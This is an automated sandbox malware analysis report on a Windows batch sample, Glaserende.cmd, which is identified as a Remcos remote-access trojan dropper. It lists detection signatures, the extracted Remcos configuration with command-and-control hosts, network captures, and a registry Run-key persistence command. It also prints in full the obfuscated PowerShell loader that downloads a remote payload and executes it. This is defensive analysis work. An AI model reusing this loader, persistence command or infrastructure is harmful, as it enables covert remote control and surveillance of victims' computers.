Windows Analysis Report
Glaserende.cmd

Overview

General Information

Sample name: Glaserende.cmd
Analysis ID: 1649826
MD5: fa26061a27d19ff170759c1b7bb924e3
SHA1: c5ca9b5dc62a51f869572ba7dea1f08c05138af6
SHA256: 43a5685405ac28381f0c4bc98f11a181923cb122cf478fc9ba81fb80c5a42184
Tags: cmdWsgiDAVuser-JAMESWT_MHT
Infos:

Detection

Remcos
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs new ROOT certificates
Joe Sandbox ML detected suspicious sample
Suspicious powershell command line found
Abnormal high CPU Usage
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

AV Detection

barindex
Source: 00000005.00000002.3383686166.000000000832C000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": ["www.vzprojekti.com:28799:1", "www.porsche-augsbrug.de:28799:1"], "Assigned name": "Neleu5143ssach", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Neleu8263scah-9YRWAH", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: Glaserende.cmd Virustotal: Detection: 12% Perma Link
Source: Yara match File source: 00000005.00000002.3383686166.0000000008304000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3383234275.00000000082A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3383686166.000000000832C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3354236670.0000000002B83000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5952, type: MEMORYSTR
Source: Submited Sample Neural Call Log Analysis: 98.1%
Source: unknown HTTPS traffic detected: 217.160.0.61:443 -> 192.168.2.8:49692 version: TLS 1.2
Source: unknown HTTPS traffic detected: 85.13.130.155:443 -> 192.168.2.8:49953 version: TLS 1.2
Source: unknown HTTPS traffic detected: 85.13.130.155:443 -> 192.168.2.8:49953 version: TLS 1.2
Source: Binary string: indows\System.Core.pdbvyr_/m source: powershell.exe, 00000005.00000002.3377683667.00000000072A9000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior

Networking

barindex
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:49954 -> 196.251.85.7:28799
Source: Malware configuration extractor URLs: www.vzprojekti.com
Source: Malware configuration extractor URLs: www.porsche-augsbrug.de
Source: global traffic TCP traffic: 192.168.2.8:49954 -> 196.251.85.7:28799
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: Joe Sandbox View IP Address: 178.237.33.50 178.237.33.50
Source: Joe Sandbox View ASN Name: SONIC-WirelessZA SONIC-WirelessZA
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49955 -> 178.237.33.50:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49953 -> 85.13.130.155:443
Source: global traffic HTTP traffic detected: GET /wpcontent/files/private/download/Glaserende.chm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: www.aennaart.deConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-admin/css/colors/blue/dRzmPWAwIjx42.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: thevisionofenergy.deCache-Control: no-cache
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /wpcontent/files/private/download/Glaserende.chm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: www.aennaart.deConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-admin/css/colors/blue/dRzmPWAwIjx42.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: thevisionofenergy.deCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: www.aennaart.de
Source: global traffic DNS traffic detected: DNS query: thevisionofenergy.de
Source: global traffic DNS traffic detected: DNS query: www.vzprojekti.com
Source: global traffic DNS traffic detected: DNS query: geoplugin.net
Source: svchost.exe, 00000008.00000002.2815590838.000001B267A00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: qmgr.db.8.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.8.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.8.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.8.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.8.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.8.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.8.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000005.00000002.3377683667.00000000071E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/
Source: powershell.exe, 00000005.00000002.3383686166.0000000008304000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3383234275.000000000827B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3383686166.0000000008339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3377683667.00000000071E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp
Source: powershell.exe, 00000005.00000002.3383686166.0000000008339000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp04Zvh
Source: powershell.exe, 00000005.00000002.3383686166.0000000008339000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpCvC
Source: powershell.exe, 00000005.00000002.3383686166.0000000008304000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpv
Source: powershell.exe, 00000002.00000002.1050074809.000001E6AA000000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3371052055.00000000059C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.3357849866.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1017565035.000001E699F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3357849866.0000000004961000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1017565035.000001E69AE99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.aennaart.de
Source: powershell.exe, 00000005.00000002.3357849866.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1017565035.000001E699F91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.3357849866.0000000004961000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lBLr
Source: powershell.exe, 00000005.00000002.3371052055.00000000059C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.3371052055.00000000059C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.3371052055.00000000059C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: edb.log.8.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000008.00000003.1203090818.000001B267920000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
Source: powershell.exe, 00000005.00000002.3357849866.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1050074809.000001E6AA000000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3371052055.00000000059C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000005.00000002.3383686166.0000000008304000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://thevisionofenergy.de/
Source: powershell.exe, 00000005.00000002.3384264961.00000000084B0000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3377683667.0000000007223000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3383234275.00000000082A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://thevisionofenergy.de/wp-admin/css/colors/blue/dRzmPWAwIjx42.bin
Source: powershell.exe, 00000005.00000002.3384264961.00000000084B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://thevisionofenergy.de/wp-admin/css/colors/blue/dRzmPWAwIjx42.binStofsHemwww.klueverimmo.de/wp
Source: powershell.exe, 00000005.00000002.3383234275.00000000082A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://thevisionofenergy.de/wp-admin/css/colors/blue/dRzmPWAwIjx42.binokP_
Source: powershell.exe, 00000002.00000002.1017565035.000001E69ADBD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1017565035.000001E69A1BB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aennaart.de
Source: powershell.exe, 00000002.00000002.1017565035.000001E69A1BB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aennaart.de/wpcontent/files/private/download/Glaserende.chmP
Source: powershell.exe, 00000005.00000002.3357849866.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aennaart.de/wpcontent/files/private/download/Glaserende.chmXR
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown HTTPS traffic detected: 217.160.0.61:443 -> 192.168.2.8:49692 version: TLS 1.2
Source: unknown HTTPS traffic detected: 85.13.130.155:443 -> 192.168.2.8:49953 version: TLS 1.2
Source: unknown HTTPS traffic detected: 85.13.130.155:443 -> 192.168.2.8:49953 version: TLS 1.2

E-Banking Fraud

barindex
Source: Yara match File source: 00000005.00000002.3383686166.0000000008304000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3383234275.00000000082A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3383686166.000000000832C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3354236670.0000000002B83000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5952, type: MEMORYSTR

System Summary

barindex
Source: amsi32_5952.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1904, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5952, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process Stats: CPU usage > 49%
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF93685C342 2_2_00007FF93685C342
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF93685B596 2_2_00007FF93685B596
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_02E8AEF8 5_2_02E8AEF8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_02E86F68 5_2_02E86F68
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_02E80D6A 5_2_02E80D6A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_02E86F68 5_2_02E86F68
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Mystery" /t REG_EXPAND_SZ /d "%Sundhedstjeneste% -windowstyle 1 $Uforligneliges155=(gi 'HKCU:\Software\Rnefolk\').GetValue('Noncooperation');%Sundhedstjeneste% ($Uforligneliges155)"
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 4129
Source: unknown Process created: Commandline size = 4153
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 4129 Jump to behavior
Source: amsi32_5952.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1904, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5952, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.evad.winCMD@13/15@4/5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\stinko.Tet Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1436:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3168:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6384:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4020:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m2rzauu3.iw4.ps1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1904
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5952
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: Glaserende.cmd Virustotal: Detection: 12%
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Glaserende.cmd" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "Get-Service;$Unsegregated97='func';Get-History;$Unsegregated97+='t';Get-History;$Unsegregated97+='i';Get-History;$Unsegregated97+='on:';(ni -p $Unsegregated97 -n Desperates -value { param($Vanskeligt);$Batel=2;do {$Skraaplanernes+=$Vanskeligt[$Batel];$Batel+=3} until(!$Vanskeligt[$Batel])$Skraaplanernes});ConvertTo-Html;(ni -p $Unsegregated97 -n Afsvoret -value {param($Paliphrasia);.($Farsering) ($Paliphrasia)});ConvertTo-Html;$Fjernsynsudsendelser=Desperates 'udNHae et ..SpW';$Fjernsynsudsendelser+=Desperates 'ine bCeCAnL SiPeeH nPrT';$Shopped=Desperates 'hjMTeo VzBoiKel,ol a a/';$Livener89=Desperates 'AnTLel DsCe1 2';$Breaming=' r[ aNsiE .t .. .SH E.rrLiVUnI HcAqeN,p So.eiTonFatGem aAU NO,AStGC,EEyRDe]Gr:Pl:.xsErELic,nUXir ib,tScyT p ArTroUrTinoMaCD oS lA =Pu$ImLCoi.rVFle Sn OEBlRT.8Hl9';$Shopped+=Desperates 'Fl5 ,. s0Pe Ov(YaWReiAnn d aoRiw .sKi oNGlT r Fo1 0 l. H0Ke;S, hWfuiKnnUn6Fj4S.;Sy Anxr,6U.4 i;Sk ParRov.d: P1Le3Pu4Ao.Ep0 s)Ol S GVie AcSvkOuoEj/ C2 0 I1.e0 a0p 1 .0Un1Ov UdFTaiRerF ejefUnoWrxDd/,u1 k3U 4Th.Li0';$Batelgangstningen=Desperates 'V,UAaSSae.eRRa-AnA gMiEPiN CT';$Hepatic=Desperates ' Bh nt,rtOvpS s P:Rv/Sv/ SwFowT wIn..aaOreKununnA,aPiaP,rVat n. UdspeRe/Dow .p ,c ao hnentSpeKun,otP /Daf ti lF.eP s /MapdirTaiBevD aDatU eAl/g ddao Vw AnDel no a ndFi/ eGInlJoaFas ee MrUreGlnSudRee ,.Ruc Oh ,m';$Chatollet=Desperates 'Mo>';$Farsering=Desperates 'StIStE,iX';$Awatch='Perfideste';$aabenbaringsreligionen='\stinko.Tet';Afsvoret (Desperates 'D,$ SGAnl SO TB,paUnlV,:SnCCuAspr,aPHaeH TUnL BEFoSCiS B=do$DoeD n VS.:Soa upElpInDUnA mtY aKr+Tr$BraAdaC.bEke N,aBOrA,cR QILanTuGBrSO.r ee llH I.oGA,I.eOk n oeReN');Afsvoret (Desperates ' $ ogUpLSwo.ubNraShlSe:KlP aR.ho oC EUrDgeUR RHjE gkGlajalAndGosAg=Fi$TeHA eFopA aIsT liCacF ..aSMypAgltaIFotHe(C $ CCsthSgAT,TUno AlCulUdEP tPo)');Afsvoret (Desperates $Breaming);$Hepatic=$Procedurekalds[0];$Colberter=(Desperates 'Bo$NyG dLCho rb AASuLFr: PFSyAE rCoVInADrNSeDEkeI.=Rendee wEl-Drot b.ij tE McCrTK. Pes yRosBitFoe SMKl.R $Blf JOpE aRpoNP sSvyHanBaS.nU,rd SMeEPun FD,rEm LBes EEEnR');Afsvoret ($Colberter);Afsvoret (Desperates 'No$T F Sa ir qv Ga n odTieMa. BH oeJoaJodSlechrOpsTo[F $FeBK,aS.tIteKolCag paEnnA,gA sF,tSen liUdn og ePen L]Br= $R,SC h Ao DpBipO eE d');$Coumaphos=Desperates 'Kl$ IFUraForH v UaAcns,d.aeFi.ExD og w n ElFloSpaM dInF NiRel reSe(Ko$LkHSfe ApFoaSkt wiRec,p,Un$ .EBrfChfO r.aae y )';$Effray=$carpetless;Afsvoret (Desperates ' K$ SGUdL LO Tb FAPhlC,: UhSuaLuGBab.rUS T i=Ap(S.tgeeS,sI tS -OrpAfaMotteHVi S,$Une ,f AFRerLsa.nyBr)');while (!$Hagbut) {Afsvoret (Desperates 'Ma$YpgS lBrogebCaaInlS,: UBSklLaoBekBetStrYvyAfkSls T= e$.oD FieclS,iDeg FeA nSucU e SnSts') ;Afsvoret $Coumaphos;Afsvoret (Desperates 'Co[ToT lH rT,E,eA eD,riS nmhg f. StS HstR.ie UaStDGa]S :Br:i s ClMeEArE SpAr(M.4Ch0Tr0P.0D.)');Afsvoret (Desperates 'U $,eGS.lHjo eB eAInl r: kh aaTrgGlbAfuOlTTa=De(Frt
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Unsegregated97='func';Get-History;$Unsegregated97+='t';Get-History;$Unsegregated97+='i';Get-History;$Unsegregated97+='on:';(ni -p $Unsegregated97 -n Desperates -value { param($Vanskeligt);$Batel=2;do {$Skraaplanernes+=$Vanskeligt[$Batel];$Batel+=3} until(!$Vanskeligt[$Batel])$Skraaplanernes});ConvertTo-Html;(ni -p $Unsegregated97 -n Afsvoret -value {param($Paliphrasia);.($Farsering) ($Paliphrasia)});ConvertTo-Html;$Fjernsynsudsendelser=Desperates 'udNHae et ..SpW';$Fjernsynsudsendelser+=Desperates 'ine bCeCAnL SiPeeH nPrT';$Shopped=Desperates 'hjMTeo VzBoiKel,ol a a/';$Livener89=Desperates 'AnTLel DsCe1 2';$Breaming=' r[ aNsiE .t .. .SH E.rrLiVUnI HcAqeN,p So.eiTonFatGem aAU NO,AStGC,EEyRDe]Gr:Pl:.xsErELic,nUXir ib,tScyT p ArTroUrTinoMaCD oS lA =Pu$ImLCoi.rVFle Sn OEBlRT.8Hl9';$Shopped+=Desperates 'Fl5 ,. s0Pe Ov(YaWReiAnn d aoRiw .sKi oNGlT r Fo1 0 l. H0Ke;S, hWfuiKnnUn6Fj4S.;Sy Anxr,6U.4 i;Sk ParRov.d: P1Le3Pu4Ao.Ep0 s)Ol S GVie AcSvkOuoEj/ C2 0 I1.e0 a0p 1 .0Un1Ov UdFTaiRerF ejefUnoWrxDd/,u1 k3U 4Th.Li0';$Batelgangstningen=Desperates 'V,UAaSSae.eRRa-AnA gMiEPiN CT';$Hepatic=Desperates ' Bh nt,rtOvpS s P:Rv/Sv/ SwFowT wIn..aaOreKununnA,aPiaP,rVat n. UdspeRe/Dow .p ,c ao hnentSpeKun,otP /Daf ti lF.eP s /MapdirTaiBevD aDatU eAl/g ddao Vw AnDel no a ndFi/ eGInlJoaFas ee MrUreGlnSudRee ,.Ruc Oh ,m';$Chatollet=Desperates 'Mo>';$Farsering=Desperates 'StIStE,iX';$Awatch='Perfideste';$aabenbaringsreligionen='\stinko.Tet';Afsvoret (Desperates 'D,$ SGAnl SO TB,paUnlV,:SnCCuAspr,aPHaeH TUnL BEFoSCiS B=do$DoeD n VS.:Soa upElpInDUnA mtY aKr+Tr$BraAdaC.bEke N,aBOrA,cR QILanTuGBrSO.r ee llH I.oGA,I.eOk n oeReN');Afsvoret (Desperates ' $ ogUpLSwo.ubNraShlSe:KlP aR.ho oC EUrDgeUR RHjE gkGlajalAndGosAg=Fi$TeHA eFopA aIsT liCacF ..aSMypAgltaIFotHe(C $ CCsthSgAT,TUno AlCulUdEP tPo)');Afsvoret (Desperates $Breaming);$Hepatic=$Procedurekalds[0];$Colberter=(Desperates 'Bo$NyG dLCho rb AASuLFr: PFSyAE rCoVInADrNSeDEkeI.=Rendee wEl-Drot b.ij tE McCrTK. Pes yRosBitFoe SMKl.R $Blf JOpE aRpoNP sSvyHanBaS.nU,rd SMeEPun FD,rEm LBes EEEnR');Afsvoret ($Colberter);Afsvoret (Desperates 'No$T F Sa ir qv Ga n odTieMa. BH oeJoaJodSlechrOpsTo[F $FeBK,aS.tIteKolCag paEnnA,gA sF,tSen liUdn og ePen L]Br= $R,SC h Ao DpBipO eE d');$Coumaphos=Desperates 'Kl$ IFUraForH v UaAcns,d.aeFi.ExD og w n ElFloSpaM dInF NiRel reSe(Ko$LkHSfe ApFoaSkt wiRec,p,Un$ .EBrfChfO r.aae y )';$Effray=$carpetless;Afsvoret (Desperates ' K$ SGUdL LO Tb FAPhlC,: UhSuaLuGBab.rUS T i=Ap(S.tgeeS,sI tS -OrpAfaMotteHVi S,$Une ,f AFRerLsa.nyBr)');while (!$Hagbut) {Afsvoret (Desperates 'Ma$YpgS lBrogebCaaInlS,: UBSklLaoBekBetStrYvyAfkSls T= e$.oD FieclS,iDeg FeA nSucU e SnSts') ;Afsvoret $Coumaphos;Afsvoret (Desperates 'Co[ToT lH rT,E,eA eD,riS nmhg f. StS HstR.ie UaStDGa]S :Br:i s ClMeEArE SpAr(M.4Ch0Tr0P.0D.)');Afsvoret (Desperates 'U $,eGS.lHjo eB eAInl r: kh
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
